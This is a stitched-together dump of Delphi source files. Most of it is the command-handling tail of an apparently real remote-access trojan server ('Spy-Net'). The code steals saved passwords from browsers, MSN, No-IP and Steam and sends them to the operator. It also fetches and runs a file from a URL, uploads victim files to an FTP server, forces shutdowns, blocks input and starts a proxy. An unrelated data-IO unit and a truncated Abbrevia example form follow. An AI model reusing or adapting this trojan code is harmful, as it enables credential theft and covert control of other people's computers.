exit; end; ToSend := FILEMANAGER + '|' + MULTITHUMBNAILSEARCH + '|' + TempStr3; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTIDELETAR_DIR then begin delete(Comando, 1, pos('|', Comando)); DeletouDir := true; while Comando <> '' do begin TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); if DeleteFolder(pchar(TempStr1)) = false then DeletouDir := false; end; if DeletouDir = true then begin ToSend := FILEMANAGER + '|' + DELDIRALLYES + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + DELDIRALLNO + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTIDELETAR_ARQ then begin delete(Comando, 1, pos('|', Comando)); DeletouArq := true; while Comando <> '' do begin TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); if MyDeleteFile(pchar(TempStr1)) = false then DeletouArq := false; end; if DeletouArq = true then begin ToSend := FILEMANAGER + '|' + DELFILEALLYES + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + DELFILEALLNO + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTIDOWNLOAD then begin Delete(Comando, 1, pos('|', Comando)); while Comando <> '' do begin Tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempInt := MyGetFileSize(Tempstr); if (fileexists(Tempstr) = true) and (TempInt > 0) and (PossoMexerNoArquivo(Tempstr) = true) then begin MuliDownFile := Tempstr; MuliDownFileSize := TempInt; StartThread(@DownloadSelected); sleep(500); end; end; While true do processmessages; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTIDOWNLOADREC then begin Delete(Comando, 1, pos('|', Comando)); while Comando <> '' do begin Tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempInt := MyGetFileSize(Tempstr); if (fileexists(Tempstr) = true) and (TempInt > 0) and (PossoMexerNoArquivo(Tempstr) = true) then begin MuliDownFile := Tempstr; MuliDownFileSize := TempInt; StartThread(@DownloadRecSelected); sleep(500); end; end; While true do processmessages; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = GETPASSWORD then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); if TempStr = ' ' then TempStr := ''; TempStr3 := NewIdentification + '_' + extractdiskserial(copy(paramstr(0), 1, pos('\', paramstr(0)))); TempMutex := CreateMutex(nil, False, '_x_X_PASSWORDLIST_X_x_'); if fileexists(ServerFileName) = true then if MyShellExecute(0, 'open', pchar(ServerFileName), nil, nil, SW_NORMAL) <= 32 then exit else begin sleep(2000); closehandle(TempMutex); NOIP := lerarquivo(MytempFolder + 'NOIP.abc', c); MSN := lerarquivo(MytempFolder + 'MSN.abc', c); FIREFOX := lerarquivo(MytempFolder + 'FIREFOX.abc', c); IELOGIN := lerarquivo(MytempFolder + 'IELOGIN.abc', c); IEPASS := lerarquivo(MytempFolder + 'IEPASS.abc', c); IEAUTO := lerarquivo(MytempFolder + 'IEAUTO.abc', c); IEWEB := lerarquivo(MytempFolder + 'IEWEB.abc', c); TempStr4 := lerreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Mozilla\Mozilla Firefox', 'CurrentVersion', ''); TempInt := strtoint(copy(tempstr4, 1, pos('.', Tempstr4) - 1)); if TempInt >= 3 then begin delete(tempstr4, 1, pos('.', Tempstr4)); if TempInt >= 4 then FF3_5 := Mozilla3_5Password else if strtoint(copy(tempstr4, 1, 1)) >= 5 then FF3_5 := Mozilla3_5Password else FF3_5 := ''; end; if ChromePassReady = true then CHROME := GetChromePass(ChromeFile) else CHROME := ''; STEAM := GetSteamPass; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(NOIP)) <> 0 then TempStr1 := TempStr1 + GETNOIP + '|' + TempStr3 + '|' + NOIP + DelimitadorDeImagem; end else if NOIP <> '' then TempStr1 := TempStr1 + GETNOIP + '|' + TempStr3 + '|' + NOIP + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(MSN)) <> 0 then TempStr1 := TempStr1 + GETMSN + '|' + TempStr3 + '|' + MSN + DelimitadorDeImagem else end else if MSN <> '' then TempStr1 := TempStr1 + GETMSN + '|' + TempStr3 + '|' + MSN + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(FIREFOX)) <> 0 then TempStr1 := TempStr1 + GETFIREFOX + '|' + TempStr3 + '|' + FIREFOX + DelimitadorDeImagem else end else if FIREFOX <> '' then TempStr1 := TempStr1 + GETFIREFOX + '|' + TempStr3 + '|' + FIREFOX + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(IELOGIN)) <> 0 then TempStr1 := TempStr1 + GETIELOGIN + '|' + TempStr3 + '|' + IELOGIN + DelimitadorDeImagem else end else if IELOGIN <> '' then TempStr1 := TempStr1 + GETIELOGIN + '|' + TempStr3 + '|' + IELOGIN + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(IEPASS)) <> 0 then TempStr1 := TempStr1 + GETIEPASS + '|' + TempStr3 + '|' + IEPASS + DelimitadorDeImagem else end else if IEPASS <> '' then TempStr1 := TempStr1 + GETIEPASS + '|' + TempStr3 + '|' + IEPASS + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(IEAUTO)) <> 0 then TempStr1 := TempStr1 + GETIEAUTO + '|' + TempStr3 + '|' + IEAUTO + DelimitadorDeImagem else end else if IEAUTO <> '' then TempStr1 := TempStr1 + GETIEAUTO + '|' + TempStr3 + '|' + IEAUTO + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(IEWEB)) <> 0 then TempStr1 := TempStr1 + GETIEWEB + '|' + TempStr3 + '|' + IEWEB + DelimitadorDeImagem else end else if IEWEB <> '' then TempStr1 := TempStr1 + GETIEWEB + '|' + TempStr3 + '|' + IEWEB + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(FF3_5)) <> 0 then TempStr1 := TempStr1 + GETFF3_5 + '|' + TempStr3 + '|' + FF3_5 + DelimitadorDeImagem else end else if FF3_5 <> '' then TempStr1 := TempStr1 + GETFF3_5 + '|' + TempStr3 + '|' + FF3_5 + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(STEAM) + 'STEAM') <> 0 then TempStr1 := TempStr1 + GETSTEAM + '|' + TempStr3 + '|' + STEAM + DelimitadorDeImagem else end else if STEAM <> '' then TempStr1 := TempStr1 + GETSTEAM + '|' + TempStr3 + '|' + STEAM + DelimitadorDeImagem; if TempStr <> '' then begin if pos(Upperstring(TempStr), Upperstring(CHROME)) <> 0 then TempStr1 := TempStr1 + GETCHROME + '|' + TempStr3 + '|' + CHROME + DelimitadorDeImagem else end else if CHROME <> '' then TempStr1 := TempStr1 + GETCHROME + '|' + TempStr3 + '|' + CHROME + DelimitadorDeImagem; //não vou deletar pq algumas vezes o ervidor não consegue criar as senhas em 2 segundos // assim eu aproveito as existentes //MyDeleteFile(MytempFolder + 'NOIP.abc'); //MyDeleteFile(MytempFolder + 'MSN.abc'); //MyDeleteFile(MytempFolder + 'FIREFOX.abc'); //MyDeleteFile(MytempFolder + 'IELOGIN.abc'); //MyDeleteFile(MytempFolder + 'IEPASS.abc'); //MyDeleteFile(MytempFolder + 'IEAUTO.abc'); //MyDeleteFile(MytempFolder + 'IEWEB.abc'); if TempStr1 <> '' then begin ToSend := GETPASSWORD + '|' + GETPASSWORDLIST + '|' + TempStr1; //_EnviarStream(ClientSocket, ToSend, true); //tentei criar nova conexão e não deu muito certo _EnviarStream(ClientSocket, ToSend); //tentei criar nova conexão e não deu muito certo end else begin ToSend := GETPASSWORD + '|' + GETPASSWORDERROR + '|'; _EnviarStream(ClientSocket, ToSend); end; end; closehandle(TempMutex); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = UPDATESERVIDORWEB then begin delete(comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(comando, 1, pos('|', Comando)); TempStr2 := MyTempFolder + inttostr(gettickcount) + '_' + ExtractFileName(TempStr1); MyURLDownloadToFile(nil, pchar(tempstr1), pchar(tempstr2), 0, nil); TempMutex := CreateMutex(nil, False, '_x_X_UPDATE_X_x_'); if MyShellExecute(0, 'open', pchar(TempStr2), nil, nil, SW_NORMAL) <= 32 then begin _EnviarStream(ClientSocket, UPDATESERVERERROR + '|'); exit; end; sleep(1000); CloseHandle(TempMutex); DesinstalarServer; ClientSocket.Disconnect(erro22); AddDebug(erro7); GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID); if PID <> getcurrentprocessid then begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; sleep(10000); exitprocess(0); end else begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; FinalizarServidor := true; sleep(10000); // tempo para todos os processos verificarem o mutex_sair // aqui eu preciso fachar o handle pq o processo não será finalizado CloseHandle(ExitMutex); exit; end; end else if copy(Comando, 1, pos('|', Comando) - 1) = UnitComandos.FILESEARCH then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr1 := GetDrives2; TempStr2 := ''; while (Tempstr1 <> '') or (Tempstr2 <> '') do begin TempStr3 := listararquivos(copy(Tempstr1, 1, pos('|', Tempstr1) - 1)); if length(TempStr3) > 3 then begin if FileExistsOnComputer(copy(Tempstr1, 1, pos('|', Tempstr1) - 1), '*' + TempStr + '*.*', true, Tempstr2) = true then break; delete(Tempstr1, 1, pos('|', Tempstr1)); end else delete(Tempstr1, 1, pos('|', Tempstr1)); end; if Tempstr2 <> '' then _EnviarStream(ClientSocket, FILESEARCHOK + '|' + Tempstr2 + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MYMESSAGEBOX then begin delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr2 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr3 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); // coloquei esse procedimento para mostrar o messagebox no primeiro handle invisível que ele achar. // assim não aparece o ícone quando mostrar o messagebox TempStr5 := WindowsList; while TempStr5 <> '' do begin TempStr6 := copy(TempStr5, 1, pos('|', TempStr5) - 1); delete(TempStr5, 1, pos('|', TempStr5)); H := StrToInt(copy(TempStr5, 1, pos('|', TempStr5) - 1)); delete(TempStr5, 1, pos('|', TempStr5)); if pos('*@*@', TempStr6) > 0 then begin i := messagebox(H, pchar(tempstr3), pchar(tempstr2), strtoint(tempstr) or strtoint(tempstr1) or MB_SYSTEMMODAL or MB_SETFOREGROUND or MB_TOPMOST); ToSend := OPCOESEXTRAS + '|' + MYMESSAGEBOX + '|' + inttostr(i) + '|' + ENTER; try _EnviarStream(ClientSocket, ToSend); except end; closethread(MasterCommandThreadId); exit; end; end; end else if copy(Comando, 1, pos('|', Comando) - 1) = unitComandos.MYSHUTDOWN then begin WindowsExit(EWX_SHUTDOWN or EWX_FORCE); end else if copy(Comando, 1, pos('|', Comando) - 1) = unitComandos.HIBERNAR then begin Hibernar(True, False, False); end else if copy(Comando, 1, pos('|', Comando) - 1) = LOGOFF then begin WindowsExit(EWX_LOGOFF or EWX_FORCE); end else if copy(Comando, 1, pos('|', Comando) - 1) = POWEROFF then begin WindowsExit(EWX_POWEROFF or EWX_FORCE); end else if copy(Comando, 1, pos('|', Comando) - 1) = MYRESTART then begin WindowsExit(EWX_REBOOT or EWX_FORCE); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESLMONITOR then begin SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 0); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 1); SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, 2); end else if copy(Comando, 1, pos('|', Comando) - 1) = BTN_START_HIDE then begin ShowStartButton(false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = BTN_START_SHOW then begin ShowStartButton(true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = BTN_START_BLOCK then begin EnableWindow(FindWindowEx(FindWindow('Shell_TrayWnd', nil),0, 'Button', nil),false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = BTN_START_UNBLOCK then begin EnableWindow(FindWindowEx(FindWindow('Shell_TrayWnd', nil),0, 'Button', nil),true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESK_ICO_HIDE then begin ShowDesktop(false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESK_ICO_SHOW then begin ShowDesktop(true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESK_ICO_BLOCK then begin EnableWindow(FindWindow('ProgMan', nil), false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESK_ICO_UNBLOCK then begin EnableWindow(FindWindow('ProgMan', nil), true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = TASK_BAR_HIDE then begin TaskBarHIDE(false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = TASK_BAR_SHOW then begin TaskBarHIDE(true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = TASK_BAR_BLOCK then begin EnableWindow(FindWindow('Shell_TrayWnd', nil), false); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = TASK_BAR_UNBLOCK then begin EnableWindow(FindWindow('Shell_TrayWnd', nil), true); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MOUSE_BLOCK then begin CloseHandle(BlockMouseHandle); sleep(100); BlockMouseHandle := CreateMutex(nil, False, '_x_X_BLOCKMOUSE_X_x_'); if fileexists(ServerFileName) = true then begin if MyShellExecute(0, 'open', pchar(ServerFileName), nil, nil, SW_NORMAL) <= 32 then CloseHandle(BlockMouseHandle); end else CloseHandle(BlockMouseHandle); while true do processmessages; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MOUSE_UNBLOCK then begin CloseHandle(BlockMouseHandle); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MOUSE_SWAP then begin if swapmouse = true then begin SwapMouseButtons(false); swapmouse := false; end else begin SwapMouseButtons(true); swapmouse := true; end; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = SYSTRAY_ICO_HIDE then begin TrayHIDE; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = SYSTRAY_ICO_SHOW then begin TraySHOW; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = OPENCD then begin AbrirCD; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = CLOSECD then begin FecharCD; closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = CHAT then begin Sairdochat := true; if MainWnd <> nil then FecharJanela(MainWnd.Handle); sleep(100); Sairdochat := false; delete(Comando, 1, pos('|', Comando)); FormCaption := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); ServerName := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); ClientName := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); MemoColor := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); delete(Comando, 1, pos('|', Comando)); MemoTextColor := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); delete(Comando, 1, pos('|', Comando)); EditColor := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); delete(Comando, 1, pos('|', Comando)); EditTextColor := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); delete(Comando, 1, pos('|', Comando)); ButtonCaption := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); Envia := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); Enviou := copy(Comando, 1, pos('|', Comando) - 1); _EnviarStream(clientSocket, CHAT + '|'); MainWnd := TSDIMainWindow.Create(0, 'Spy-Net'); MainWnd.OnDestroy := MainDestroy; MainWnd.DoCreate(WS_VISIBLE or WS_CAPTION or WS_POPUP); MainWnd.Height := 500; MainWnd.Width := 500; MainWnd.Color := MainColor; processmessages; Memo1 := TAPIMemo.Create(MainWnd.Handle); Memo1.Height := MainWnd.ClientHeight - 21; Memo1.Width := MainWnd.ClientWidth; Memo1.XPos := 0; Memo1.YPos := 0; Memo1.Color := MemoColor; Memo1.TextColor := MemoTextColor; processmessages; Edit1 := TAPIEdit.Create(MainWnd.Handle); Edit1.XPos := 0; Edit1.YPos := Memo1.Height; Edit1.Height := 21; Edit1.Width := Memo1.Width - 75; Edit1.Color := EditColor; Edit1.TextColor := EditTextColor; processmessages; Button1 := TAPIButton.Create(MainWnd.Handle); Button1.XPos := Edit1.Width; Button1.YPos := Edit1.YPos; Button1.Width := 75; Button1.Caption := ButtonCaption; Button1.Height := Edit1.Height; Button1.OnClick := Button1Click; processmessages; SetWindowText(MainWnd.Handle, pchar(FormCaption)); ChangeTextFont(Memo1.Handle, FontName, FontSize); ChangeTextFont(Edit1.Handle, FontName, FontSize); ChangeTextFont(Button1.Handle, FontName, FontSize); processmessages; closehandle(CheckHWND); CheckHWND := StartThread(@CheckMSG); DefinirHandle; closehandle(CheckHWND); if MainWnd <> nil then FecharJanela(MainWnd.Handle); memo1 := nil; edit1 := nil; button1 := nil; MainWnd := nil; //try memo1.Free; except end; //try edit1.Free; except end; //try button1.Free; except end; //try MainWnd.Free; except end; end else if copy(Comando, 1, pos('|', Comando) - 1) = CHATMSG then begin delete(Comando, 1, pos('|', Comando)); MensagemCHATRecebida := copy(Comando, 1, pos('|', Comando) - 1); end else if copy(Comando, 1, pos('|', Comando) - 1) = CHATCLOSE then begin Sairdochat := true; //if MainWnd <> nil then FecharJanela(MainWnd.Handle); end else if copy(Comando, 1, pos('|', Comando) - 1) = GETSHAREDLIST then begin TempStr := ListSharedFolders; if TempStr = '' then ToSend := FILEMANAGER + '|' + NOSHAREDLIST + '|' else ToSend := FILEMANAGER + '|' + GETSHAREDLIST + '|' + TempStr; _EnviarStream(ClientSocket, Tosend); end else if copy(Comando, 1, pos('|', Comando) - 1) = DOWNLOADDIR then begin ToDownloadDIR := ''; if DownloadDIRId <> 0 then CloseThread(DownloadDIRId); delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); ThreadDownloadDir := TThreadDownloadDir.Create(TempStr); DownloadDIRId := BeginThread(nil, 0, @DownloadDirStart, ThreadDownloadDir, 0, ThreadId); while true do _processmessages; end else if copy(Comando, 1, pos('|', Comando) - 1) = DOWNLOADDIRSTOP then begin if DownloadDIRId <> 0 then CloseThread(DownloadDIRId); DownloadDIRId := 0; end else if copy(Comando, 1, pos('|', Comando) - 1) = CHANGEATTRIBUTES then begin delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); if (fileexists(Tempstr) = true) and (PossoMexerNoArquivo(Tempstr) = true) and (TempStr1 <> 'XXX') then begin SetAttributes(TempStr, TempStr1); _EnviarStream(ClientSocket, FILEMANAGER + '|' + MENSAGENS + '|' + Tempstr + '|' + '492' + '|'); end else _EnviarStream(ClientSocket, FILEMANAGER + '|' + FILEMANAGERERROR + '|' + Tempstr + '|'); end else if copy(Comando, 1, pos('|', Comando) - 1) = SENDFTP then begin delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); //address delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); //user delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); //pass delete(Comando, 1, pos('|', Comando)); TempStr3 := copy(Comando, 1, pos('|', Comando) - 1); //port delete(Comando, 1, pos('|', Comando)); while Comando <> '' do begin TempStr4 := copy(Comando, 1, pos('|', Comando) - 1); //filename delete(Comando, 1, pos('|', Comando)); if (fileexists(TempStr4) = true) and (PossoMexerNoArquivo(TempStr4) = true) and (MyGetFileSize(TempStr4) > 0) then begin if EnviarArquivoFTP(TempStr, TempStr1, TempStr2, strtoint(TempStr3), TempStr4) = false then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr4 + '|' + '496' + '|'; _EnviarStream(ClientSocket, Tosend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr4 + '|' + '494' + '|'; _EnviarStream(ClientSocket, Tosend); end; end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr4 + '|' + '496' + '|'; _EnviarStream(ClientSocket, Tosend); end; end; end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_STATUS then begin CoInitialize(NIL); i := GetMSNStatus; if i = 5 then begin tempstr := ' ' + MSNseparador + ' ' + MSNseparador + ' ' + MSNseparador; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(5) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); exit; end; tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(i) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_CONECTADO then begin CoInitialize(NIL); SetMSNStatus(0); tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(GetMSNStatus) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_OCUPADO then begin CoInitialize(NIL); SetMSNStatus(1); tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(GetMSNStatus) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_AUSENTE then begin CoInitialize(NIL); SetMSNStatus(2); tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(GetMSNStatus) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_INVISIVEL then begin CoInitialize(NIL); SetMSNStatus(3); tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(GetMSNStatus) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_DESCONECTADO then begin CoInitialize(NIL); SetMSNStatus(4); tempstr := getcurrentmsnsettings; ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + tempstr + inttostr(GetMSNStatus) + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MSN_LISTAR then begin CoInitialize(NIL); i := GetMSNStatus; if i = 4 then begin ToSend := OPCOESEXTRAS + '|' + MSN_STATUS + '|' + inttostr(i) + '|'; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); exit; end; tempstr := GetContactList; ToSEnd := OPCOESEXTRAS + '|' + MSN_LISTAR + '|' + tempstr + '|'; CounInitialize; _EnviarStream(ClientSocket, ToSend); closethread(MasterCommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = STARTPROXY then begin delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); //porta try TempInt := strtoint(TempStr); except exit; end; if TempInt = 0 then exit; CloseHandle(ProxyMutex); sleep(100); ProxyMutex := CreateMutex(nil, False, pchar('xX_PROXY_SERVER_Xx')); if StartHttpProxy(TempInt) = false then CloseHandle(ProxyMutex); while true do sleep(high(integer)); end else if copy(Comando, 1, pos('|', Comando) - 1) = STOPPROXY then begin CloseHandle(ProxyMutex); end else if copy(Comando, 1, pos('|', Comando) - 1) = PINGTEST then begin Tempstr := PONGTEST + '|' + BufferTest; //for i := 0 to 99 do begin _EnviarStream(ClientSocket, TempStr); //_processmessages; end; end else end; end.
unit InflatablesList_ItemShop_IO_00000001; {$INCLUDE '.\InflatablesList_defs.inc'} interface uses Classes, AuxTypes, InflatablesList_ItemShop_IO_00000000; type TILItemShop_IO_00000001 = class(TILItemShop_IO_00000000) protected Function GetFlagsWord: UInt32; virtual; procedure SetFlagsWord(FlagsWord: UInt32); virtual; procedure InitSaveFunctions(Struct: UInt32); override; procedure InitLoadFunctions(Struct: UInt32); override; procedure SaveItemShop_00000001(Stream: TStream); virtual; procedure LoadItemShop_00000001(Stream: TStream); virtual; end; implementation uses DateUtils, BinaryStreaming, InflatablesList_ItemShop_IO; Function TILItemShop_IO_00000001.GetFlagsWord: UInt32; begin Result := 0; end; //------------------------------------------------------------------------------ procedure TILItemShop_IO_00000001.SetFlagsWord(FlagsWord: UInt32); begin // nothing to do end; //------------------------------------------------------------------------------ procedure TILItemShop_IO_00000001.InitSaveFunctions(Struct: UInt32); begin If Struct = IL_ITEMSHOP_STREAMSTRUCTURE_00000001 then fFNSaveToStream := SaveItemShop_00000001 else inherited InitSaveFunctions(Struct); end; //------------------------------------------------------------------------------ procedure TILItemShop_IO_00000001.InitLoadFunctions(Struct: UInt32); begin If Struct = IL_ITEMSHOP_STREAMSTRUCTURE_00000001 then fFNLoadFromStream := LoadItemShop_00000001 else inherited InitLoadFunctions(Struct); end; //------------------------------------------------------------------------------ procedure TILItemShop_IO_00000001.SaveItemShop_00000001(Stream: TStream); begin Stream_WriteUInt32(Stream,GetFlagsWord); // rest of the structure is unchanged from ver 0 SaveItemShop_00000000(Stream); Stream_WriteInt64(Stream,DateTimeToUnix(fLastUpdateTime)); end; //------------------------------------------------------------------------------ procedure TILItemShop_IO_00000001.LoadItemShop_00000001(Stream: TStream); begin SetFlagsWord(Stream_ReadUInt32(Stream)); LoadItemShop_00000000(Stream); fLastUpdateTime := UnixToDateTime(Stream_ReadInt64(Stream)); end; end.
(* ***** BEGIN LICENSE BLOCK ***** * Version: MPL 1.1 * * The contents of this file are subject to the Mozilla Public License Version * 1.1 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * http://www.mozilla.org/MPL/ * * Software distributed under the License is distributed on an "AS IS" basis, * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License * for the specific language governing rights and limitations under the * License. * * The Original Code is TurboPower Abbrevia * * The Initial Developer of the Original Code is * TurboPower Software * * Portions created by the Initial Developer are Copyright (C) 1997-2002 * the Initial Developer. All Rights Reserved. * * Contributor(s): * * ***** END LICENSE BLOCK ***** *) {*********************************************************} {* ABBREVIA: QUCFMAIN.PAS *} {*********************************************************} {* ABBREVIA Example program file *} {*********************************************************} {$DEFINE UsingCLX} unit QuCfMain; interface uses SysUtils, Classes, QGraphics, QForms, AbHexVw, AbQCmpnd, QDialogs, QMenus, QTypes, QImgList, QExtCtrls, QControls, QComCtrls; type TfmCfMain = class(TForm) StatusBar1: TStatusBar; tvDirectory: TTreeView; tvImages: TImageList; OpenDialog1: TOpenDialog; mnuMain: TMainMenu; mnuFile: TMenuItem; mnuFileNew: TMenuItem; mnuFileOpen: TMenuItem; N6: TMenuItem; mnuFileExit: TMenuItem; mnuEdit: TMenuItem; mnuEditAddFile: TMenuItem; mnuEditAddFolder: TMenuItem; mnuEditDelete: TMenuItem; N1: TMenuItem; mnuEditChangeDir: TMenuItem; mnuPopupMenu: TPopupMenu; puAddFile: TMenuItem; puAddFolder: TMenuItem; puViewFile: TMenuItem; puChangeDir: TMenuItem; puViewCompoundFile: TMenuItem; puDelete: TMenuItem; Rename1: TMenuItem; Defrag1: TMenuItem; SaveDialog1: TSaveDialog; OpenDialog2: TOpenDialog; pnlHexView: TPanel; procedure mnuFileNewClick(Sender: TObject); procedure mnuFileOpenClick(Sender: TObject); procedure mnuFileExitClick(Sender: TObject); procedure mnuEditAddFileClick(Sender: TObject); procedure mnuEditAddFolderClick(Sender: TObject); procedure mnuEditDeleteClick(Sender: TObject); procedure mnuEditChangeDirClick(Sender: TObject); procedure puViewFileClick(Sender: TObject); procedure puViewCompoundFileClick(Sender: TObject); procedure Rename1Click(Sender: 